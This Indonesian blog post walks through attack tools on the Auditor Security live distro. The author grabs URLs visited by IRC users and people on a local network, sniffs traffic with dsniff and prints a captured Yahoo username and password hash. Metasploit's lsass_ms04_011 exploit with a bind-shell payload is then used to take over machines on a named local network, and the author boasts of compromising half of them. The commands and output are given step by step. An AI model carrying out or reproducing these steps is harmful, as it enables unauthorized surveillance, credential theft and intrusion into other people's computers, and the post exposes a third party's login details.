| ||||||||||||||
| ||||||||||||||
Auditor security merupakan sebuah system operasi yang bersifat live-system berbasiskan pada knopix. Menurut penciptanya yang dituliskan pada http://remote-exploit.org , linux Auditor Security diciptakan untuk memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset yang optimal serta penggunakan yang user friendly. Program – program open source pada auditor security menawarkan toolset yang komplit untuk meng-analysis keamanan sebuah system, byte per byte. Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat pada linux Auditor Security. A. Grabbing URL Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh seseorang tanpa ataupun sepengetahuan dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC dan pada jaringan lokal yang terhubung dengan internet. 1. Grabbing URL pada channel IRC Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan XCHAT yang telah tersedia secara bult-in pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah. Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung pada server dalnet tanggal 1 September 2005. ftp.orghttp://echo.or.id http://irc.jraxis.com/dalnet/default/ http://kline.dal.net/exploits/akills.htm#ma http://kline.dal.net/exploits/akills.htm#ma))) http://kline.dal.net/massads/mup.htm http://kline.dal.net/proxy/ http://miranda-im.org http://tiongkokmusic.com:2222/listen.pls http://unut.hollosite.com http://valueshells.com http://valueshells.com/disc.html http://www.dal.net/ http://www.dal.net/aup/ http://www.equinix.net http://www.kecoak.or.id http://www.malanghack.net/ http://www.rayofshadow.or.id http://www.valueshells.com irc.hackerszone.orgirc.vsnl.com www.balihack.or.idwww.bandung-dal.net WwW.BaNdUnG.tKwww.dal.net/proxies www.jraxis.comwww.malanghack.net WwW.PsYcHoPeD.InFowww.scoopsite.com www.superask.netwww.VALUESHELLS.com www.ValueShells.comwww.valueshells.com www.valueshells.comwww.w0nk.org www.zone-h.org/en/defacements/mirror/id=2840693/> www.zone-h.org/en/defacements/mirror/id=2840696/> Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter pada channel – channel diatas. Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL yang dikunjungi tiap chatter. 2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing URL pada jaringan lokal yang terhubung pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan URL Snarf ketikan perintah berikut pada konsole : hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal tidur dan membuka hasil grabbing keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil penulis capture, penulis hanya menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam 00:15:37 sampai 06:21:10 pada tanggal 02/Sep/2005. 192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?lastact=approve&sc=933 HTTP/1.1" - - "http://www.friendster.com/friendrequests.php?statpos=homealerts" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)" Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer dengan IP 192.168.10.5 pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses www.friendster.com dan kemungkinan besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan browser dari user tersebut adalah Mozzila/5.0 dengan mamakai sistem operasi linux. B. Sniffing Menggunakan DSNIFF Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu dalam suatu network dangan jalan meng-capture paket – paket data yang ada pada suatu network dan kemudian menganalisinya untuk diambil informasinya yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah tersedia pada linux auditor security. Untuk memulai sniffing ketikan perintah berikut ini: hyraxz@chidori~dove# dsniff –i eth0 –W /mnt/hda5/passwd_HhAN.db perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket yang melintasi eth0 dan menuliskan hasilnya pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory /mnt/hda5/. Untuk membaca hasilnya gunakan perintah berikut ini: hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa dibuka menggunakan notepad saat di Windows, ketik perintah berikut : hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis documentasikan : 09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET /reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&. last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&. emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie &passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1 HTTP/1.1Host: us.rd.yahoo.com Berikut analysis dari hasil sniffing di atas: 1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan pada koneksi TCP antara host dengan IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80 denagan memakai protokol HTTP. 2. User Name untuk login ke server e-mail dari user tersebut adalah rip_zombie dengan password hasil enkripsi MD5 “ace61b359fa543aceccf111dbd767e74†(tanpa tanda petik). 3. Server mail yahoo menggunakan methode enkripsi MD5. C. Remote Exploit Remote exploit adalah suatu program yang dijalankan pada computer attacker, digunakan untuk menginjeksi komputer target sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun sepengetahuan dari korban. Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit. Menyusup di Jaringan SKB50 Menggunakan Metasploit Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai dengan IP dari jaringan SKB50. berikut ini konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan SKB50. hyraxz@chidori~dove# ifconfig –eth0 192.168.0.10 netmask 255.255.255.0 hyraxz@chidori~dove# ifconfig eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0 inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:712 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b) Interrupt:5 Base address:0x9800 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:10 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:500 (500.0 b) TX bytes:500 (500.0 b) Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit : hyraxz@chidori~dove# cd /opt/auditor/metasploit hyraxz@chidori~dove# ./msfconsole jika berhasil maka akan muncul tulisan seperti berikut ini : 888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888 + -- --=[ msfconsole v2.4 [75 exploits - 75 payloads] msf > untuk memulai penggunakanya ketikan perintah-perintah dibawah ini: msf > show exploits Metasploit Framework Loaded Exploits ====================================
msf > use lsass_ms04_011 msf lsass_ms04_011 > show payloads Metasploit Framework Usable Payloads ====================================
msf lsass_ms04_011 > set PAYLOAD win32_bind PAYLOAD -> win32_bind msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27 RHOST -> 192.168.0.27 msf lsass_ms04_011(win32_bind) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ------------ ------------------ required RHOST 192.168.0.19 The target address required RPORT 139 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 4444 Listening port for bind shell Target: Automatic msf lsass_ms04_011(win32_bind) > exploit RHOST -> 192.168.0.27 msf lsass_ms04_011(win32_bind) > exploit [*] Starting Bind Handler. [*] Detected a Windows XP target (KICKS) [*] Windows XP may require two attempts [*] Sending 8 DCE request fragments... [*] Sending the final DCE fragment [*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> netstat -a netstat -a Active Connections
^c Caught interrupt, exit connection? [y/n]y msf lsass_ms04_011(win32_bind) > Analisa dari hasil aktivitas diatas adalah sebagai berikut : metasploit meng-attack korban melalui port 139 kemudian memasukan payload yang akan membangun hubungan antara korban dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan melalui port 4444 pada sisi korban dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan korban terbentuk maka attacker menguasai sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat analisa dilakukan pada jaringan lokal SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini berarti bahwa 50% jaringan SKB50 pada saat itu ada di tangan attacker ;). |
Tidak ada komentar:
Posting Komentar
Komentar Anda